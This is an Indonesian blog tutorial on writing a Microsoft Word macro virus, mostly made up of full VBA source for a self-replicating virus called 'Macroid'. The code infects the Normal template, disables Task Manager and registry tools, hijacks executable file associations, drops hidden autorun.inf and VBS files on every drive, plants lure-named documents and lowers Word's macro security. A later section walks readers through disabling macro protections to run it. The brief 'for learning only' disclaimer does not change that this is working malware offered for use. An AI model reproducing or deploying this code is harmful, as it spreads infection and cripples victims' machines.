Virus

23 Jul

Pendahuluan

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Cara Kerja
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2 IBM, dan Sun Operating System. Virus yang ganas akan merusak perangkat keras.

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini membahas tentang cara membuat virus? Biasanya kan lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS

  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.

Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

Tenang, aku dah siapkan kok sourcenya. Makan neh source code!

‘This is my code’s virus
‘
‘Macro Viruses
‘[Macroid]
‘
‘Hanya untuk pembelajaran
Private Sub Document_Close()
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content  = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf  & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf  & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite  “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”,  “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If  Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And  Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And  Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And  Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If  Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And  Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And  Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And  Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print  #1, “a.regwrite ” & Chr(34) &  “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34)  & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34)  & “REG_DWORD” & Chr(34)
Print  #1, “a.regwrite ” & Chr(34) &  “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34)  & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34)  & “REG_DWORD” & Chr(34)
Print  #1, “a.regwrite ” & Chr(34) &  “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34)  & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34)  & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then
Dim isicrita As String
isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _
Chr(34)  & “Ms.Word is a thing that can be used as a power to break  everything…. ” & Chr(34) & vbCrLf & “(Morphic)”
Open Environ$(“windir”) & “\Macroid.doc” For Output As #1
Print #1, isicrita
Close #1
End If
If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then
Open Environ$(“windir”) & “\avmc.vbs” For Output As #1
Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”
Print #1, “for each FD in fs.drives”
Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”
Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”
Print #1, “end if”
Print #1, “Next”
Close #1
End If
ActiveDocument.Save
NormalTemplate.Save
End Sub
Private Sub Document_Open()
CommandBars(“Tools”).Controls(“Macro”).Visible = False
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
CommandBars(“Tools”).Controls(“Customize…”).Visible = False
CommandBars(“Tools”).Controls(“Options…”).Visible = False
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content  = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf  & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf  & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite  “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”,  “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If  Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And  Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And  Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And  Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If  Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And  Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And  Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And  Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print  #1, “a.regwrite ” & Chr(34) &  “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34)  & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34)  & “REG_DWORD” & Chr(34)
Print  #1, “a.regwrite ” & Chr(34) &  “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34)  & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34)  & “REG_DWORD” & Chr(34)
Print  #1, “a.regwrite ” & Chr(34) &  “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34)  & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34)  & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
End Sub

Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI

Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

Jawabannya lihat di bawah!!

CARA MEMBUAT VIRUS LANJUTAN

Ini nih, dulu saya udah janji untuk ngelanjutin sample virus macro yang saya buat dulu. Di tutorial kali ini saya akan jelasin sedikit demi sedikit untuk mempelajari virus macro ini…
Pernah dengar virus Macroid? Itu adalah salah satu contoh virus macro yang saya buat.

Langsung aja.

Buka visual Basic editor di Tools>macro>visual basic editor ato tekan pada keyboard Alt+F11

Tampilannya mirip dengan VB6 kita, dan penggunaan sourcenya juga gak jauh beda…
Misalnya :

Dim AD as object

Ya gak. Mirip kan dengan script di VB6? Dan dilanjutkan dengan penggunaan ”set”. Misalnya :

set AD=ActiveDocument.VBProject.VBComponents.Item(1)

ha ha ha… oke deh gak usah main-main. Langsung keserius nya aja…

Script dibawah ini untuk mengubah ”Name” document yang diinfeksi (umumnya ini yang dijadikan sebagai nama virus macro kita)

dim AD as object
 set AD=ActiveDocument.VBProject.VBComponents.Item(1)
if AD.Name  “Macroid” then
 AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
 AD.Name = “Macroid”
 end if

contoh script diatas adalah untuk mengubah name document menjadi ”Macroid”. (efek ini baru bisa dijalankan setelah virus yang utuh dieksekusi)
Script diatas bisa kamu sisipkan di ”Document_Close()” ato di ”Document_Open()” ato di ”Document_New()”
Kalo disisipkan di “Document_Close()” efeknya akan berjalan saat document ditutup. Dan begitu juga dengan “Document_Open()” dan “Document_new()”
Kalo disisipkan di “Document_Open()” efeknya akan berjalan saat document dibuka.
Kalo disisipkan di “Document_new()” efeknya akan aberjalan saat document baru dibuka.

Ini contoh gambarnya…

image002

Efeknya adalah ini.

Itu tandanya virus “Macroid”!!! ha ha ha… oke.

Sebenarnya saya mau menjelaskan lebih banyak soal trik-trik virus macro, tapi saya yakin sebelum sampai diatas pasti masih banyak masalah untuk kalian…

Sebelumnya kalian harus perhatikan security macro kalian.
Lihat Tools>Macro>security

image006

Yang harus kita pilih adalah opsi ”Low” supaya Ms.Word akan menjalankan semua script di visual Basic Editor. Karena kita masih belajar-belajar biarkan saja kita yang atur security ini, nanti kalo kita udah mau bikin virus macro, ada caranya supaya virus kita yang ngatur security ini… tenang aja…

Setelah kita set securitynya, silakan save document terus hidupkan document kita tadi.

Ada satu lagi masalah… kalo nanti ”misalnya” ada gambar seperti dibawah ini:

image010

Berarti ada hal yang harus kita atur dulu… Buka lagi security macro tadi.
Lalu pada tab Trusted Publishers silakan ceklis “Trust aceess to Visual Basic Project”

Nah klo itu dah dilakukan, maka untuk berikut-berikutnya kalo kita mau ngetes virus macro kita udah bisa boss….

Sekian dulu tutorialnya, tunggu tutorial berikutnya ya….

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: